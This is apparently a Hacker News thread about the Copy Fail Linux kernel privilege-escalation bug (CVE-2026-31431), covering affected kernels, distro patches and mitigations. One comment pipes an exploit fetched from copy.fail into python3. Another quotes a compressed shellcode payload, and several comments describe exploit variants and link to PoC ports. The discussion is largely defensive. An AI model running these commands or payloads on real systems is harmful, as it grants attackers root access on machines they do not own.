https://gist.github.com/m3nu/c19269ef4fd6fa53b03eb388f77464d...

m3nu1mo ago· 4 in thread

I wasn't able to unload algif_aead on RHEL 9/10 because it's built in, rather than a module.

So here the next-best thing I found: Disable AF_ALG via systemd. Needs drop-ins for all exposed services. Here an Ansible playbook that covers ssdh and user@, which are the main ones usually.

byron32561mo ago

How about blacklisting algif_aead initialization function on RHEL 9/10? I added "initcall_blacklist=algif_aead_init" to the kernel boot options and rebooted. The exploit is not working anymore.

https://www.freedesktop.org/software/systemd/man/latest/syst...

pkoiralap1mo ago

I was coming up with the same intuition. However, it's like a whack-a-mole. What about cronjobs and slurmjobs and other services? Is there a way to do this directly on systemd so that all other processes inherit it rather than doing it on each one?

chucky_z1mo ago

`/etc/systemd/system/service.d/${...}.conf`

I think this is what you're looking for.

yrro1mo ago

FYI RHEL's SELinux policy blocks AF_ALG socket creation for confined services out of the box. But disabling via RestrictAddressFamilies= unit option, or initcall_blacklist= kernel parameter, seems to be a good mitigation for unconfined services, users and containers.

not_your_vase1mo ago· 4 in thread

Is there a readable version of the exploit readily available by any chance? Gotta admit that I failed binary-zip-interpretation-with-naked-eye class twice

progval1mo ago

The binary "zip" isn't the exploit, it's the shellcode. The exploit is the rest, which changes the code of a SUID executable (su).

tommy_axle1mo ago

Go version came in handy https://github.com/badsectorlabs/copyfail-go especially for systems without the very latest python (os.slice)

Slightly more readable Python version at https://gist.github.com/grenkoca/b82281a4706e936072979acf54b...

stackghost1mo ago

The call to zlib basically overwrites a minimal ELF into a portion of the `su` binary, which exceve's /bin/sh.

tgies1mo ago

I have a C translation here that should be pretty readable https://github.com/tgies/copy-fail-c

rkeene21mo ago· 4 in thread

Interestingly it fails for me because my `su` isn't world-readable:

  $ stat /bin/su
    File: /bin/su
    Size: 59552           Blocks: 118        IO Block: 59904  regular file
  Device: 0,52    Inode: 796854      Links: 1
  Access: (4711/-rws--x--x)  Uid: (    0/    root)   Gid: (    0/    root)
  Access: 2023-09-18 13:23:03.117105665 -0500
  Modify: 2021-02-13 05:15:56.000000000 -0600
  Change: 2023-09-18 13:23:03.119105665 -0500
   Birth: 2023-09-18 13:23:03.117105665 -0500

I'm not sure I have any setuid/setgid binaries that are world-readable...

rkeene21mo ago

A workaround might be to make all setuid/setgid files non-world-readable because then they cannot be opened at all, and thus there is no setuid file to replace the contents of.

hashstring1mo ago

Eh, if you can pollute page caches this won’t safe you.

Think modifying shared libraries, ld preload, cron, I guess on some systems /etc/passwd even.

There are a lot of files readable that should definitely not be writable.

zerocrates1mo ago

It being readable is the default configuration most places, after all the purpose is to call it from a non-privileged user. But I could see it being made non-readable since its use is discouraged nowadays... though then I'd expect sudo to be readable as an alternative.

rkeene21mo ago

My `sudo` is also not readable. Files/directories don't need to be readable to be executed. I can still use `su` and `sudo`.

giis1mo ago· 4 in thread

As soon as I read this

>Shared dev boxes, shell-as-a-service, jump hosts, build servers — anywhere multiple users share a kernel. any user becomes root

jumped out of bed and went straight into webminal.org servers as local user and ran the python code. It says permission denied on sock() call.

Then I tested with local laptop with it:

```

$ uname -a

Linux debian 6.12.43+deb12-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.12.43-1~bpo12+1 (2025-09-06) x86_64 GNU/Linux

$ python3 copy_fail_exp.py

# cd /root && ls

bluetooth_fix_log.txt dead.letter overcommit_memorx~ overcommit_memory~ overcommit_memorz~ resize.txt snap

```

It does provide the root access!

a961mo ago

Beware that running this kind of thing even as a test on a host you don't own may well be a criminal offense!

m-ueberall1mo ago

I also tested this on an Ubuntu 24.04 (x86_64) host w/ GA kernel ("6.8.0-103-generic #103-Ubuntu SMP PREEMPT_DYNAMIC Tue Feb 10 13:34:59 UTC 2026 x86_64 GNU/Linux") and wasn't able to reproduce the "problem", although `canonical-livepatch` tells me that there are currently "no livepatches available".

tommy_axle1mo ago

Could be worse (we'll see) as this could be a wild ride along with react2shell or some of the compromised packages as of late.

Joe_Cool1mo ago

Anyone tried in an Azure Cloud Shell?

Asking for a friend ;)

EDIT: Don't. "/s" in case not obvious.

maxtaco1mo ago· 4 in thread

Use extreme caution running arbitrary code on your machines, especially obfuscated code that tickles kernel bugs! (edited)

stackghost1mo ago

Analysis of the POC concurs with my tests that confirm that the portion of `su` that gets overwritten does not survive a reboot.

wang_li1mo ago

it's living in your page cache, not on your disk. flush the caches and it'll disappear.

charcircuit1mo ago

The page explicitly describes that it is stealthy as it does not make permanent changes, only corrupting the binary in memory.

scratchyone1mo ago

unfortunately the page can also lie to you haha. it seems people have reviewed the code by now, but running suspicious shellcode you don't fully understand is never a great idea.

https://openwall.com/lists/oss-security/2026/04/30/12

arcfour1mo ago· 3 in thread

It's unfortunate that this does not include which versions of the kernel are vulnerable/patched, especially since this is a builtin module which cannot be easily removed with rmmod...

I was wondering if I was vulnerable running Fedora 44, kernel 6.19.14, and after a few minutes of digging I was able to find the linux-cve-announce mailing list post: https://lore.kernel.org/linux-cve-announce/2026042214-CVE-20... which says:

  ...fixed in 6.18.22 with commit fafe0fa2995a0f7073c1c358d7d3145bcc9aedd8

  ...fixed in 6.19.12 with commit ce42ee423e58dffa5ec03524054c9d8bfd4f6237

  ...fixed in 7.0 with commit a664bf3d603dc3bdcf9ae47cc21e0daec706d7a5

Hope that helps.

hnarn1mo ago

most distros backport fixes which does not increment that version number. i.e. they patch it, they do not ship a completely new kernel release.

baggy_trough1mo ago

Greg KH says more backports coming soon.

noisy_boy1mo ago

Thanks for this - I was wondering why I got the password prompt on my Fedora 43 with latest packages.

corvad1mo ago· 3 in thread

If this is verified, this is a very big deal. Root access on any shared computer. Additionally do we know what kernel versions and stable versions have the patch?

Tuna-Fish1mo ago

I just tested on my home server running ubuntu 24.04 LTS with newest kernel from repositories, got root.

Avamander1mo ago

Can Livepatch mitigate this or is it already? I don't know where to look this up.

https://docs.python.org/3/library/os.html#os.splice

ranger_danger1mo ago

As far as mainline goes, only 7.0 and up have the patch already.

archon8101mo ago· 3 in thread

    curl https://copy.fail/exp | python3 && su
    Traceback (most recent call last):
      File "<stdin>", line 9, in <module>
      File "<stdin>", line 5, in c
    AttributeError: module 'os' has no attribute 'splice'

Does this mean I'm not affected or it's a buggy script?

Edit: python3 is python 3.6 on my system. Runnung with python3.10 instantly roots. Crazy find!

z3n1th1mo ago

It is trivial to re-write splice, just because the PoC uses it does not mean you're "not affected".

orlp1mo ago

What is your Python version? Splice was added in 3.10.

nnnniiiiiiggg1mo ago

do yourself a favor just pwn your laptop now with a sledgehammer and switch to an ipad or one of those big number phones for the elderly

Ekaros1mo ago· 3 in thread

So this could be usable in lot of places with Python and Linux running? Not that I have too many Linux devices around. Still, might be handy sometimes on personal devices.

kro1mo ago

This can likely be shipped as binary code without dependencies like python, as the bug is in the kernel.

ranger_danger1mo ago

C version here: https://gist.github.com/alufers/921cd6c4b606c5014d6cc61eefb0...

SteveNuts1mo ago

There's nothing specific about this related to Python, that's just demonstrating how it works.

This is usable anywhere on an affected Kernel version

TehCorwiz1mo ago· 3 in thread

It does not behave as described on EndeavorOS (arch-based) running kernel 6.19.14-arch1-1. I receive the error:

Password: su: Authentication token manipulation error

I'm guessing this means it's already patched?

john_strinlai1mo ago

yes, it was reported on march 23rd, patches on april 1.

you are reading about it now because it has been patched.

marshray1mo ago

No it hasn't.

Ubuntu before 26.04 LTS (released a week ago) are currently listed as vulnerable.

Debian other than forky and sid are currently listed as vulnerable.

This is a disgrace.

dimastopel1mo ago

same result on my arch machine as well.

pixel_popping1mo ago· 3 in thread

Yet, some people will still continue to say that "AI" isn't ready to replace (or strongly assist) our workflows, sure, some of the best humans devs left a vulnerability that serious (It's extremely serious, so many container as a service are vulnerable) for 9 years and an agent found it in 1 hour, maybe it's time to wake up and accept that it's UNSAFE to not use AI for security review as well?

collinmcnulty1mo ago

A human security researcher found the core issue and an agent searched for where to apply it. I don’t think “an agent found it in one hour” is a fair summary of what happened.

marshray1mo ago

"The starting insight — that splice() hands page-cache pages into the crypto subsystem and that scatterlist page provenance might be an under-explored bug class — came from human research by Taeyang Lee at Xint. From there, Xint Code scaled the audit across the entire crypto/ subsystem in roughly an hour. Copy Fail was the highest-severity finding in the run."

So, if anything, this might argue against the presence of huge quantities of high-severity bugs in this part of the Linux kernel (that could be found by "Xint Code"-class scanning systems).

pixel_popping1mo ago

I was a bit rough, agreed, but the overall point is still correct, I kinda want to emphasize that I've also ran hundred of loops recently (combination of opus-4.6/gpt-5.4/gemini-3.1-pro-preview) toward a Rust codebase that we manage and that we deemed secure after many audits and found 2 serious issues as well in it, this was also audited externally by a third party that we've paid, which makes me genuinely scared of releasing anything without deep AI verification nowadays.

Anybody has the same feeling?

jeffwass1mo ago· 2 in thread

This submission is currently the main HN submission.

As of now the submission title is simply “Copy Fail”.

Given the severity of the exploit, can we edit the Title to add some context that it’s a major Linux vulnerability?

Eg the other submissions say this : “Copy Fail: 732 Bytes to Root on Every Major Linux Distribution.”

ramon1561mo ago

I dont really get why you'd

- buy a domain

- vibe code a page/artifact/whatever (which, given the quality of LLM wordings, only makes an argument less strong)

- post it on HN with no further explanation in the title

Why not write a detailed report? Even a tweet makes much more sense in my head than this. Even a logo??

Sorry if this comes over as salty, I guess I'm just not getting the thought process.

8 more replies

jcul1mo ago

Yes, strongly agree.

This is HUGE news, I would have skimmed over "Copy Fail".

The blog post might be a better place to link to also, it has more details on the exploit.

https://github.com/theori-io/copy-fail-CVE-2026-31431/issues

There are also some good threads on which distros are vulnerable and mitigations on the github page.

RandomGerm4n1mo ago· 2 in thread

That is why we should get rid of setuid binaries. GrapheneOS does not use them and was therefore not affected. On the desktop there is also a project called Secureblue based on Fedora Atomic that is moving in a similar direction and has already eliminated a large number though not all setuid binaries. As an alternative to sudo, su, and pkexec there is for example run0, which is available in distributions using systemd. Since systemd 259 there is now also the --empower parameter which like sudo elevates the privileges of the regular user. Essentially any distribution could start removing sudo and create an alias so that users don’t have to adjust immediately.

dontdoxxme1mo ago

No, it is not affected by the exploit as presented. This is a page cache write, so writing to a binary that root will run later can work too. This isn’t a reason to push an agenda that dislikes setuid binaries.

https://security-tracker.debian.org/tracker/CVE-2026-31431

strcat1mo ago

AOSP not permitting setuid/setgid binaries is certainly useful attack surface reduction but isn't how it blocks exploiting this vulnerability. It blocks it via SELinux policy having allowlists for socket types which don't permit AF_ALG to be used outside of the dumpstate service.

The vulnerability also isn't present in standard AOSP GKI kernels (including the stock Pixel OS) or GrapheneOS kernels since they use a minimal kernel with tons of functionality disabled.

Kernel attack surface is mainly done via SELinux policies on AOSP including ioctl command allowlists per device type such as permitted GPU driver ioctl commands, io_uring only being permitted for a few core processes and much more. AOSP uses seccomp-bpf for apps, etc. too but it's mainly SELinux doing kernel attack surface reduction in practice.

skilled1mo ago· 2 in thread

This looks like an extraordinary find at first glance.

Does this mean you can go from a basic web shell from a shared hosting account to root? I can see how that could wreak havoc really quickly.

barbegal1mo ago

Yes I would imagine lots of those type of services would be vulnerable if they hadn't updated to the latest kernel versions.

stackghost1mo ago

As of this comment, Debian Stable ("Trixie", though I hate codenames) doesn't have a fix in place and remains vulnerable, or at least their CVE tracker shows it as such:

layer81mo ago· 2 in thread

Debian page: https://security-tracker.debian.org/tracker/CVE-2026-31431

Sohcahtoa821mo ago

Oddly, the POC doesn't work on my Debian 12 (Bookworm) EC2 instance. Everything that should indicate it's vulnerable is there, including the ability to socket(38,5,0).bind("aead", "authencesn(hmac(sha256),cbc(aes))")

layer81mo ago

What kernel version is it? (`uname -r`)

commandersaki1mo ago· 2 in thread

Tried this on my arch VPS which has a few users that hasn't been rebooted for 122 days.

Got:

    OSError: [Errno 97] Address family not supported by protocol

I guess AF_ALG is not part of the Arch Linux LTS kernel?

Edit:

Looks like on Arch you have to go out of your way to have this enabled.

    $ zcat /proc/config.gz | grep CONFIG_CRYPTO_USER_API
    CONFIG_CRYPTO_USER_API=m
    CONFIG_CRYPTO_USER_API_HASH=m
    CONFIG_CRYPTO_USER_API_SKCIPHER=m
    CONFIG_CRYPTO_USER_API_RNG=m
    # CONFIG_CRYPTO_USER_API_RNG_CAVP is not set
    CONFIG_CRYPTO_USER_API_AEAD=m
    # CONFIG_CRYPTO_USER_API_ENABLE_OBSOLETE is not set
    $ uname -r
    6.12.63-1-lts

sltkr1mo ago

On my Arch boxes the official exploit works, both with the LTS kernel (6.18.21-1-lts) and the mainline release (6.19.6-arch1-1).

commandersaki1mo ago

Yeah I think maybe it loads the module on demand. The problem is I've upgraded my kernel many times in the last 122 days which wipes out the running or last installed kernel modules directory. I'm guessing if I had my running kernel modules directory it would on demand load and I'd get root.

parliament321mo ago· 2 in thread

Note that in kubernetes, setting `allowPrivilegeEscalation` to false (which you should be doing already, it's in the Pod Security Standards Restricted profile) mitigates this.

j16sdiz1mo ago

according to this reddit post https://www.reddit.com/r/kubernetes/comments/1szn6p1/comment...?

> the primary mitigation is still patching the node kernel; user namespaces are blast-radius reduction, not a complete mitigation for this path

TZubiri1mo ago

They have a setting for that?

That's crazy, feels like prompting "make no mistakes" to the llm.

If it works, when would you want it turned on? Why isn't false the default

fsflover1mo ago· 2 in thread

As usual, Qubes is not vulnerable, since by its design, any untrusted software runs in dedicated VMs with hardware virtualization.

Meanwhile, recent Xen CVEs also do not affect Qubes, as usual, https://www.qubes-os.org/news/2026/04/28/xsas-released-on-20...

handedness1mo ago

Why do you suppose Joanna Rutkowska made a point of calling Qubes OS "reasonably secure", rather than making claims like, "Qubes is not vulnerable" and "there is no attack vector"?

https://doc.qubes-os.org/en/latest/user/advanced-topics/mana...

kuhsaft1mo ago

You know that Xen is just a hypervisor right? Dom0 (the admin Qube) is running the Linux kernel and is vulnerable like any other Linux system. DomU (App Qubes) also run the Linux kernel and are just as vulnerable.

You can check your DomU kernels using this guide:

If your Dom0 or DomU is running kernel < 6.18.22, or between 6.19.0 and 16.19.12 you are vulnerable.

https://github.com/QubesOS/qubes-linux-kernel/pull/1272 commit fafe0fa2995a of the kernel mirror

Currently stable version of QubeOS does not have the patched kernels. https://yum.qubes-os.org/r4.3/current/dom0/fc41/rpm/

charcircuit1mo ago· 2 in thread

SUID binaries once again assisted a local privilege escalation attack. This is a major problem that distros can't keep ignoring.

marshray1mo ago

There's a claim upthread that a straightforward variation works against /etc/passwd.

q3k1mo ago

You can also just use this to patch libc and turn close() into close-but-also-give-me-a-root-shell().

chasil1mo ago· 2 in thread

On the downside, I need to push new kernels to all my servers.

On this bright side, does this mean Magisk is coming to all unpatched Android phones?

akdev1l1mo ago

No, Android doesn’t have suid binaries to exploit like in the PoC

tardedmeme1mo ago

The vulnerability can also be used on any binary that is already running as root and you can open for reading. So yes, any android app can now escalate to root if android has the vulnerable module.

krunck1mo ago· 2 in thread

Wow. I tried it on an old testing VM of Ubuntu 24.04 that had not been touched for a few months. Instant root with the bonus that any user that runs "su" gets root too. I updated the VM thinking it would be fixed afterward. Nope.

akdev1l1mo ago

You’d have to reinstall the su binary itself I guess

cyberpunk1mo ago

It just changes the page cache for the su binary, a reboot will revert it.

pkoiralap1mo ago· 2 in thread

Does anyone have a workaround for it? Edit: I don't understand why the comment would be downvoted.

angch1mo ago

I used, for debian based systems:

  printf "# CVE-2026-31431\nblacklist algif_aead\ninstall algif_aead /bin/false\n" | sudo tee /etc/modprobe.d/blacklist-algif_aead.conf >/dev/null && sudo update-initramfs -u

a961mo ago

There's some workarounds in https://copy.fail/#mitigation

nh21mo ago· 1 in thread

If you want to use the suggested mitigation (disabling kernel module `algif_aead` with a modprobe config), and you do not want to run that whole obfuscated shell code to get an actual root shell, but only check if the module can be loaded, here is a readable version of its first few lines:

    python3 -c 'import socket; s = socket.socket(socket.AF_ALG, socket.SOCK_SEQPACKET, 0); s.bind(("aead","authencesn(hmac(sha256),cbc(aes))")); print("algif_aead probably successfully loaded, mitigation not effective; remove again with: rmmod algif_aead")'

Similarly, when the mitigation is in place,

    modprobe algif_aead

should fail with an error.

archon8101mo ago

    modprobe algif_aead
    modprobe: FATAL: Module algif_aead not found in directory /lib/modules/6.14.3-x86_64-linode168

Yet this kernel is vulnerable.

https://object.ceph-waw3.hswaw.net/mastodon-prod/media_attac...

q3k1mo ago· 1 in thread

Quickly dove into this.

1. Yes, it's real.

2. Current chain can write any arbitrary content to any user-readable file (into the page cache).

3. Current chain relies on an available target suid binary that you can open() as a lowpriv user.

4. Current exploit relies on that binary being /bin/su and then being able to execve(/bin/sh, 0, 0) (which doesn't work on alpine, etc.). The former is easily replaced in the code. The latter needs a rebuilt payload ELF (also easy).

5. The authors say they have other chains (including ones that allow container escapes). I believe them.

6. A mildly de-minified PoC for Alpine with a new payload ELF is at hackerspace[pl]/~q3k/alpine.py . You'll need /bin/ping from iputils. This should be now somewhat reliable on any distro that has a `/bin/sh` and any setuid-and-readable binary (you'll just need to find it on your own).

q3k1mo ago

And yeah, you can just change arbitrary instructions of any running process (including privileged) as long as you have read access to that process' binary:

TZubiri1mo ago· 1 in thread

It looks like this is legit, but the script is very phishy and I wouldn't run it in unvirtualized or disposable systems.

https://github.com/theori-io/copy-fail-CVE-2026-31431/blob/m...

>zlib.decompress(d("78daab77f57163626464800126063b0610af82c101cc7760c0040e0c160c301d209a154d16999e07e5c1680601086578c0f0ff864c7e568f5e5b7e10f75b9675c44c7e56c3ff593611fcacfa499979fac5190c0c0c0032c310d3"))

This is not source code, this is binary, it's entirely possible that this contains a script that downloads another malicious script (or that simply contains the malicious commands)

That said, I understand why a terser script might have been prioritized.

EDIT: There's a couple of C ports in the comments that contain more details and no compressed payloads.

q3k1mo ago

> This is not source code, this is binary, it's entirely possible that this contains a script that downloads another malicious script (or that simply contains the malicious commands)

It doesn't, it's just a compressed ELF file that does setuid(0); execve(/bin/sh, 0, 0). You can just unzlib it and throw it in a disassembler.

tjbecker1mo ago· 1 in thread

For this crowd, I highly suggest checking out the technical writeup

[0] https://rkeene.org/viewer/tmp/copy_fail_exp.c.htm

belkinpower1mo ago

This has frustratingly low information density for a technical writeup. The LLM output on the marketing page is whatever, but here it really feels like my time isn’t being respected.

dgellow1mo ago· 1 in thread

That’s the most AI-written page ever made

collinmanderson1mo ago

Yes. So cringy.

rkeene21mo ago· 1 in thread

I couldn't get the POC to work with my version of Python so I had ChatGPT convert it to C [0] and was able to verify my Slackware system does not appear to be affected, but my NixOS system would be if I had any world-readable suid binaries (which I had to make one to test it).

miniBill1mo ago

Don't you have like, a sudo in /run/wrappers/bin?

EDIT: Sorry, I failed at reading your message. Never mind.

erans1mo ago· 1 in thread

For agents, if you are concerned about that, block access to "su" as it is interactive anyway. Not loading it into the memory will block the attack. If you are using AgentSH (https://www.agentsh.org) you can add a rule to block "su" and soon be able to block AF_ALG sockets if you want to further protect things.

tardedmeme1mo ago

This vulnerability can affect any file you can read. The PoC uses "su" but any setuid binary or any binary that root invokes or is already running as root is vulnerable, as well as many configuration files.

WhyNotHugo1mo ago· 1 in thread

> Any setuid-root binary readable by the user works.

Interesting detail. On Alpine, `/usr/bin/su` is not readable by any user, so the PoC doesn't work.

I suspect that the underlying issue can be exploited in other ways, but it makes me think that there's no reason for any suid binary to be world-readable.

ranger_danger1mo ago

Wouldn't executing it still put it in the page cache, just in a different place?

themafia1mo ago· 1 in thread

> If your kernel was built between 2017 and the patch

This is why I compile my own kernel. I disable things I don't use. If it's not present it can't hurt you.

> block AF_ALG socket creation via seccomp regardless of patch state.

Likewise I use seccomp to only allow syscalls that are necessary. Everything else is disabled. In the programs I have that need to connect to a backend socket, that is done, and then socket creation is disabled.

tosti1mo ago

Any pointers on how to set that up? Like, run all the things through strace, cut the first field, sort, uniq, run through some template and something somesuch what how?

42wim1mo ago· 1 in thread

I've (well, mostly Claude did) created a module that unloads the active AF_ALG (builtin) module and mitigates the exploit without having to reboot.

Tested on almalinux8/9

https://gist.github.com/42wim/2e3cc3c92333e4c2730541e6f0e038...

YMMV

zackr1mo ago

looking good to me so far, thank you!

Deception48791mo ago· 1 in thread

And here is a no-reboot, ebpf-based blocker if you don't need the feature:

https://github.com/lestercheung/linux-copy-fail-workarounds/

atgreen1mo ago

I created something similar earlier today: https://github.com/atgreen/block-copyfail

1vuio0pswjnm71mo ago· 1 in thread

The "default exploit" would not work for me as there is no python nor /usr/bin/su on the computer I'm using

Failed to meet the assumptions I guess

NB. I'm only referring to the "default exploit" not the vulnerability itself

krunck1mo ago

Any Setuid binary will work: passwd, chsh, chfn, mount, sudo, pkexec.

DannyBee1mo ago· 1 in thread

I love how it says "Standalone PoC. Python 3.10+ stdlib only (os, socket, zlib). Targets /usr/bin/su by default; pass another setuid binary as argv[1]."

Except you can't pass another setuid binary as argv[1] because the AI writing this slop never added that feature to this python script.

I can't get it to work on any distro i've tried.

tptacek1mo ago

The landing page is just bad. There's no way around it.

The bug is pretty great. I feel bad for the researchers who did the work.

chvish1mo ago· 1 in thread

Are kernel crypto modules even loaded by default on enterprise distros

ranger_danger1mo ago

Attempting to open an AF_ALG socket will load the module on-demand if necessary.

jchw1mo ago· 1 in thread

I tried this on NixOS, but it doesn't seem to be easily reproducible. There's no /usr/bin/su - okay, fine: I changed it to /run/wrappers/bin/su, but that didn't work, and I think the reason why is because the NixOS suid wrappers have +x but not +r:

    $ ls -lah /run/wrappers/bin/su
    -r-s--x--x 1 root root 70K Apr 27 11:09 /run/wrappers/bin/su

Not that this makes the underlying mechanism of the exploit any better, but I wonder what else you can do with it. Is there a way to target a suid binary that doesn't have +r? I guess all of the suid binaries necessarily don't, since the wrapper system doesn't grant it and you can't have suid binaries in the /nix/store.

I know it's also unrelated, but this is the most aggressively obvious LLM slop copy I've ever seen and it is a page with like 30 sentences. I guess we're just seriously doing this, huh?

chuso1mo ago

It's the same with Gentoo, setuid binaries are installed without read permission.

But modifying a setuid binary is just the demo exploit that was published with the vulnerability disclosure. The vulnerability actually allows modifying four bytes in any readable file. That means system configuration files, other binaries intended to be run by root, libraries... It's not limited to modifying setuid binaries.

firesteelrain1mo ago· 1 in thread

RHEL is listing this as fix deferred for RHEL 8 and 9.

yrro1mo ago

They've bumped the severity and 8/9/10 are now 'affected'. Hope a patch comes soon!

baggy_trough1mo ago· 1 in thread

Is this fixed in any stable release kernel yet?

Wingy1mo ago

7.0-rc1 has a tag with it:

    % git describe a664bf3d603d
    v7.0-rc1-10-ga664bf3d603d

I suspect this means the stable 7.0 has it too.

porridgeraisin1mo ago

Better explanation of the write up (still from original exploit author) : https://xint.io/blog/copy-fail-linux-distributions

bblb1mo ago

What is "RHEL 14.3"? Was this site a one shot prompt. Quality.

tgies1mo ago

The Python dependency is easily eliminated, and the x86_64 payload made cross-platform: https://github.com/tgies/copy-fail-c

dist-epoch1mo ago

> Will you release the full PoC?

> Yes — it's on this page. We held it for a month while distros prepared patches; the major builds are out as of this writing.

There is no update available for Ubuntu 24, PoC works and just tried updating.

w2seraph1mo ago

holy smokes it just rooted my just installed from ISO Ubuntu server

mikeweiss1mo ago

Anyone have any idea when Bottlerocket will acknowledge CVE? Seems like a critical for kubernetes nodes......

https://github.com/bottlerocket-os/bottlerocket/security/adv...

aniou1mo ago

Looks like a LLM hallucination - there is no thing like "RHEL 14.3", although referenced kernel signature (6.12.0-124.45.1.el10_1) contains reference to real RHEL release, i.e. 10.1.

nromiun1mo ago

I tried this exploit on Android and it looks like you need root in the first place to create an AF_ALG socket. I guess it is an SELinux policy to disable AF_ALG entirely.

deep2secure1mo ago

I checked it. Very nice efforts made to create it

pelasaco1mo ago

Fun day for people running bare metal GPU nodes, where teams have been training models for months, and now it must be abruptly aborted to apply security patches... is that something that can be resumed, or do they have to restart from scratch?

DetroitThrow1mo ago

Despite the copy/images being weird about RHEL 14.3, this seems to work. Wow?

SeriousM1mo ago

I wonder if this is a problem for very old honeypods like the one on turris omnia, sold many years ago. Docker wasn't a thing these days and everything was done with lcx containers, if at all.

0xmagic01mo ago

0xdf made a nice breakdown video: https://www.youtube.com/watch?v=wQ914geKOcw

kayson1mo ago

s6-overlay is a popular container image base for many self hosted services, and it uses an suid binary for startup. I wonder if this could be used to escape the container?

alexdevphp1mo ago

Has anyone seen patched kernel updates for Ubuntu yet? I’m not seeing anything available so far on my systems

ilaksh1mo ago

Does this affect my Hetzner VPSs running Ubuntu probably? Or Nebius H200 VMs?

They are probably Ubuntu 24 but don't remember.

zdimension1mo ago

Works on all my servers. This is terrifying.

realaaa1mo ago

AI marketing goes ballistic now

rtpg1mo ago

Can we just make a one-pager instead of this nonsense LLM bullet pointed list that is explaining this issue to your pointy-haired CEO instead of to sysadmins who understand the badness in 3 lines? Yeesh

lloydatkinson1mo ago

You can tell security has become complete theatre when people are registering domains and setting up a whole fucking website for individual ones.

eaf7e2811mo ago

I'm impressed that such a serious problem popped up out of nowhere.

In my opinion, this mostly affects countries that are still using outdated systems, especially critical systems.

This gives bad actors a direct route to the root. Having an easily accessible root is not funny.

j / k navigate · click thread line to collapse

516 comments

279 comments · 71 top-level

ebiggers1mo ago· 29 in thread

The algorithm being used in this exploit, "authencesn", is even an IPsec implementation detail, which never should have been exposed to userspace as a general-purpose en/decryption API.

still_grokking1mo ago

As I did not know what AF_ALG is in the first place I've searched for it and found this here:

https://www.chronox.de/libkcapi/html/ch01s02.html

It states the following:

> There are several reasons for AF_ALG:

I can't judge whether this is a good justification, but there is one.

buckle80171mo ago

You should take note that this is written by the person that wrote the bad patch.

So grain of salt.

buredoranna1mo ago

Please don't rely on my judgement for this being safe for production, but after blacklisting the modules, the provided python exploit failed.

Check if the following are modules

  grep CONFIG_CRYPTO_USER_API /boot/config-$(uname -r)

If they are, you can try blacklisting them

  /etc/modprobe.d/blacklist-crypto-user-api.conf
  
  """
  blacklist af_alg
  blacklist algif_hash
  blacklist algif_skcipher
  blacklist algif_rng
  blacklist algif_aead

  install af_alg /bin/false
  install algif_hash /bin/false
  install algif_skcipher /bin/false
  install algif_rng /bin/false
  install algif_aead /bin/false
  """

  update-initramfs -u

Can anyone comment on the ramifications this?

ebiggers1mo ago

To be clear, general-purpose Linux distros generally can't disable these kconfig options yet, due to these cases. But there are many Linux systems that simply don't need this functionality.

A good project for someone to work on would be to fix iwd and cryptsetup to always use userspace crypto, as they should.

strenholme1mo ago

Just reboot after applying this change.

alpn1mo ago

For anyone wondering: AF_ALG is a Linux socket interface that exposes the kernel’s crypto API via file descriptors, using normal read(2)/write(2) calls for hashing and encryption.

dnnddidiej1mo ago

I wonder can the kernel just remove it and distros put on a compatiability layer.

https://blog.cloudflare.com/the-linux-kernel-key-retention-s...

l1k1mo ago

It does enable address space separation of secret keys from user space, which some people love:

https://www.youtube.com/watch?v=7djRRjxaCKk

https://www.youtube.com/watch?v=lvZaDE578yc

So it's not as simple as "should not exist". I agree though that there doesn't seem to be a valid need to expose authencesn to user space.

Disclosure: I'm co-maintaining crypto/asymmetric_keys/ in the kernel and the author/presenter in the first two links is another co-maintainer.

ebiggers1mo ago

That can be done in userspace too -- different userspace processes have different address spaces too.

SeriousM1mo ago

I was completely unaware of https://syzbot.org, thanks for sharing!

eqvinox1mo ago

The primary benefit of AF_ALG is IMHO when it's combined with kernel keyrings, i.e. ALG_SET_KEY_BY_KEY_SERIAL.

To steal from the sibling post:

It's even more than this: you can do crypto ops in user space without ever even having the key to begin with.

[Ed.: that said, maybe AF_ALG should be locked behind some CAP_*]

ebiggers1mo ago

angry_octet1mo ago

Better implemented as another user space process than in the kernel.

TZubiri1mo ago

YAGNI stocks are rising, Gentoo devs that compile their own kernel probably yeeted this module. Alpine, and MUSL deviants are probably immune to this downswing.

KISS remains unaffected for the time being.

wolttam1mo ago

dev_l1x_be1mo ago

Why is this available in the kernel on a box that does not use ipsec? should this be compile time enabled module instead than a generic solution?

tosti1mo ago

That said, elsewhere ITT it's pointed out there are only a few use cases so far.

KnuthIsGod1mo ago

Removing this will make the friendly spooks at NSA very sad....

Fr0styMatt881mo ago

How did it get in? Isn’t Linus known for being rightfully fussy about what makes it into the kernel?

Would be an interesting story.

eqvinox1mo ago

Yeah, so, as we just learned (dirty.frag) the issue isn't algif_aead, it's authencesn and you can exploit it through plain network sockets rather than AF_ALG.

anabis1mo ago

Many things, such as ksmbd seems ill-advised when looked at from security. New AI driven exploits era will likely make projects more wary to adding functions.

WhyNotHugo1mo ago

iwd requires CONFIG_CRYPTO_USER_API_AEAD, so disabling this would break Wi-Fi for a lot of people.

sidewndr461mo ago

any idea what software this will break once I turn this kernel configuration off?

ebiggers1mo ago

iwd is the main culprit (for systems that use it instead of wpa_supplicant).

I think cryptsetup / LUKS also requires it with some non-default options. With the default options, it works fine with the kconfigs disabled.

There's not much else, as far as I know. Normally programs just use a userspace library instead, such as OpenSSL.

sharts1mo ago

If it should not exist what’s the rationale for keeping it instead of removing it?

400thecat1mo ago

derefr1mo ago

---

My own thought process on how this could work below (but I'm not a kernel contributor, so you can probably immediately picture a design better than I can):

But that's a bit painful, organizationally. Puts a lot of work on the distro maintainers' shoulders, that they might just not bother doing. Prone to error. I think there are better alternatives.

[1] https://github.com/theori-io/copy-fail-CVE-2026-31431/blob/m...

m3nu1mo ago

What other kernel modules would you suggest disabling that aren't used usually?

amluto1mo ago

IIRC some versions of cryptsetup require access to these APIs.

It doesn’t help that the historically dominant userspace implementation of most of this stuff was OpenSSL, which is also terrible.

smlacy1mo ago· 23 in thread

The fetishism of "byte count" (here, as "732 byte python script") needs to stop, especially when in a context like this where they're trying to illustrate a real failure modality.

Looking at their source code [1] it starts with this simple line:

import os as g,zlib,socket as s

Anyway, I could go on. :) Let's just stop fetishizing byte count

vitus1mo ago

Hilariously, "os as g" adds one more byte than it saves, since os is only used 4 times but the alias takes 5 extra bytes to save 4. And "socket as s" comes out even.

If you wanted real savings, you'd use "d=bytes.fromhex" instead of defining a function -- 17 bytes!! And d('00') -> b'\0' for -2 bytes.

